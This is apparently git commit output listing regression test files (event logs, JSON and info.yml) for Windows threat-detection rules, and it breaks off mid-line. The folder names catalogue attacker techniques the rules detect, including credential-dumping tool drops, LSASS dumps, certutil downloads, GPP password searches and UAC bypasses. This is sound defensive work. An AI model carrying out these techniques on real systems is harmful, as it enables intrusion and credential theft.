 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/41ca393d-538c-408a-ac27-cf1e038be80c.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json
 create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml
 create mode 100644
regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_lsass/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml 
create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_finger_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_gpresult_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml create mode 100644 
regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls create mode 100644 regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx create mode 100644 
regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json create mode 100644 regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json create mode 100644 regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml create mode 100644 
regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json create mode 100644 